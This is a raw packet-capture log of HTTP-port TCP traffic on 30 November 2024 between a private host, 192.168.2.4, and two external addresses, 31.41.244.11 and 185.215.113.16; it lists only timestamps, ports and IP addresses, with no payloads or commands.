Nov 30, 2024 04:06:52.559012890 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:52.567318916 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:52.567416906 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:52.569813013 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:52.575819969 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:52.575946093 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:52.578843117 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:52.584424019 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:52.584573030 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:52.584662914 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:52.592782974 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:52.592835903 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:52.592909098 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:52.593038082 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:52.601310968 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:52.601357937 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:52.601424932 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:52.601465940 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:52.609899044 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:52.609967947 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:52.610018969 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:52.610112906 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:52.618375063 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:52.618423939 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:52.618423939 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:52.618491888 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:52.626795053 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:52.626842022 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:52.626864910 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:52.626897097 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:52.729482889 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:52.729584932 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:52.731781006 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:52.731900930 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:52.736475945 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:52.736565113 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:52.741152048 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:52.741314888 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:52.744895935 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:52.745831013 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:52.745934010 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:52.750526905 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:52.750617981 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:52.755168915 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:52.755264997 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:52.759426117 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:52.759844065 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:52.759958029 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:52.764369965 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:52.764420033 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:52.768879890 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:52.769001007 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:52.773405075 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:52.773499966 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:52.776787996 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:52.777916908 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:52.778037071 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:52.782463074 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:52.782574892 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:52.784502983 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:52.787000895 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:52.787048101 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:52.787116051 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:52.787620068 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:52.791472912 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:52.791572094 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:52.791574955 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:52.791740894 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:52.796026945 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:52.796161890 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:52.799206972 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:52.800527096 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:52.800690889 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:52.805051088 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:52.805166960 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:52.806293964 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:52.809640884 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:52.809773922 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:52.814188004 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:52.814248085 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:52.818612099 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:52.818732977 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:52.821935892 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:52.831574917 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:52.864835024 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:52.864931107 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:52.867113113 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:52.867235899 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:52.868650913 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:52.871629953 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:52.871705055 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:52.874017954 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:52.921485901 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:52.921621084 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:52.923382044 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:52.923423052 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:52.923474073 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:52.927166939 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:52.927253962 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:52.930951118 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:52.931035042 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:52.933602095 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:52.934700966 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:52.934815884 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:52.936690092 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:52.938205957 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:52.938339949 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:52.939354897 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:52.941684961 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:52.941771030 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:52.945163965 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:52.945164919 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:52.945285082 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:52.947824001 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:52.948674917 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:52.948719978 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:52.948784113 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:52.948822975 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:52.952152014 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:52.952264071 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:52.955543041 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:52.955682039 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:52.956579924 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:52.958947897 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:52.959001064 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:52.959079981 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:52.959125042 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:52.962382078 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:52.962431908 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:52.962479115 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:52.962517023 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:52.965795040 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:52.965842962 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:52.965933084 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:52.965976954 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:52.969197989 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:52.969247103 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:52.969286919 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:52.969331980 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:52.972596884 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:52.972650051 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:52.972707987 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:52.972753048 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:52.976125956 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:52.976176977 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:52.976224899 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:52.976273060 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:52.979460001 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:52.979512930 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:52.979564905 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:52.979610920 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:52.982884884 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:52.982934952 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:52.983002901 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:52.983078957 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:52.986268044 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:52.986321926 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:52.986380100 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:52.986428976 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:52.989660978 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:52.989715099 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:52.989752054 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:52.989799023 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:52.993109941 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:52.993168116 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:52.993205070 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:52.993247986 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:52.996484041 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:52.996536016 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:52.996556997 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:52.996598959 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:52.998760939 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:52.998877048 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:52.998955011 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.000969887 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.001025915 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.001104116 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.001169920 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.003248930 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.003304005 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.003393888 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.003457069 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.005491972 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.005599976 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.007298946 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.007678986 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.007730961 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.007832050 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.008023977 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.009908915 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.009962082 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.010004044 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.010051966 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.012118101 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.012165070 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.012228012 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.012273073 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.014344931 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.014401913 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.014441967 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.014477968 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.016588926 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.016639948 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.016678095 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.016726971 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.018790007 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.018836021 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.018891096 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.018939018 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.020988941 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.021039963 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.021049976 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.021084070 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:53.021146059 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.021148920 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.021212101 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.021363974 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.021447897 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.021456957 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.021501064 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:53.021806002 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.021852016 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:53.021879911 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.021888971 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.021930933 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:53.022166967 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.022270918 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.022315025 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:53.023250103 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.023298025 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.023354053 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.023396969 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.025480986 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.025532961 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.025571108 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.025615931 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.027690887 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.027739048 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.027806997 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.027849913 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.029953957 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.030025005 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.030057907 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.030177116 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.032177925 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.032233000 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.113634109 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.113688946 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.113794088 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.113845110 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.114726067 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.114775896 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.114836931 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.114886045 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.116933107 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.116983891 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.117070913 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.117119074 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.119184017 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.119271994 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.119297028 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.119338989 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.121406078 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.121462107 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.121505976 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.121550083 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.123260975 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.123317957 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.123349905 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.123397112 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.125111103 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.125160933 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.125228882 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.125296116 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.126933098 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.127006054 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.127027988 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.127127886 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.128724098 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.128772974 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.128834009 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.128881931 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.130491018 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.130537033 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.130600929 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.130640984 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.132261992 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.132316113 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.132370949 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.132426023 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.133991957 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.134051085 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.134083986 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.134135008 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.135646105 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.135698080 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.135761023 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.135813951 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.137285948 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.137345076 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.137402058 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.137469053 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.138928890 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.139072895 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.139784098 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.140542030 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.140593052 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.140630960 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.140681028 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.141028881 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.141143084 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.141196012 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:53.142112017 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.142168045 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.142224073 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.142273903 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.143662930 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.143717051 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.143768072 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.143824100 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.145242929 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.145292997 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.145303965 CET	80	49894	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:53.145308018 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.145436049 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.146795034 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.146848917 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.146972895 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.147025108 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.148289919 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.148344040 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.148375988 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.148420095 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.149810076 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.149851084 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.149868011 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.149889946 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:53.151297092 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.151401997 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:53.151547909 CET	49892	80	192.168.2.4	31.41.244.11
